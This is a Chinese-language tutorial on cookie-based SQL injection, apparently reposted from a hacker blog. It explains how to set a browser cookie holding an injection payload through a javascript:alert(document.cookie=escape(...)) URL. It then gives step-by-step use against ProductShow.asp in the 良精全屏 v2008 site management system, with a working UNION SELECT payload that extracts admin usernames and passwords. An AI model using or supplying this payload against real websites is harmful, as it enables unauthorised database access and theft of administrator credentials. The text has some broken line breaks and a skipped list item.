cookies的注入语句:javascript:alert(document.cookie="id="+escape("这就是asp? id=xx后面xx代表的数值) and (这里是注入
攻击代码)"));
这儿用到了javascript语言的知识,我把这语句的意思分解如下,以便大家理解:
1:"alert()"显示信息对话框的alert()方法,它生成的是一个独立的小窗口,称作对话框,用来显示一条信息和一个按钮.(我们在跨站中常用到)
2:"document.cookie"我们在处理cookie时,javascript将它保存为document对象的一个属性,其属性名称是cookie,利用这个属性,我们可以创建和读取cookie
数据,在
程序中可以使用:"alert(document.cookie)"调用当前页面的cookie
数据项值.在我们启动
浏览器打开页面后,如果存在相应的cookie,那么它被装入到document对象的cookie属性中,document.cookie属性采用name=value对应方式保存各个cookie
数据项值.document(文档)对象表示在
浏览器里显示的HTML(向页面输出
数据),cookie属性是允许读写HTTP的cookie;字符串类型
4:escape()函数;它将字符串中所有的非字母字符转换为用字母数字表示的等价字符串,具有编码字符串的
功能.一般情况下,cookie通常由
服务器端的程序通过HTTP请求和响应头发送给浏览器,但是,利用javascript,可以在本地浏览器中
设置cookie
格式:name=value的属性是指定cookie数据项的名称,value是该名称对应的值,它是一个字符串,也可是由一系列字符组成,name和value中不能包含分号,逗号及空白,(50"and 1=1")有分号,逗号及空白,所以我们要用到escape()函数对他们进行编码
上面整句的意思大家都明白了吧,就是设置调用当前创建的cookie数据项值,在设置cookie时,它们首先保存在浏览器的内存中,退出浏览器时,才能被写入到
硬盘中.(这就是在下面操作中为什么在退出后,再输入链接的地址原因)
案例由trace原文章引用
良精全屏v2008网站
管理系统 Sql注入
漏洞
Author:Tr4c3[at]126[dot]com
http://www.nspcn.org
http://www.tr4c3.com
涉及版本:良精全屏v2008网站管理系统
漏洞
文件:ProductShow.asp
漏洞描述:参考良精企业网站管理系统漏洞
http://www.tr4c3.com/post/201.html
http://hi.baidu.com/tr4c3/blog/item/6ea6d258c84ad683810a1878.html
利用方法:
1.
http://www.tr4c3.com/Chinese/ProductShow.asp?ArticleID=126
2.javascript:alert(document.cookie="ArticleID="+escape("126 union select 0,1,2,3,4,5,6,username,8,realname,10,password,12,13,14,15,16,17,18,19,20,21,22,23,24 from admin"))
3.
http://www.tr4c3.com/Chinese/ProductShow.asp
Powered by IXPUB.Net © 2001-2007 All Right Reserved. 
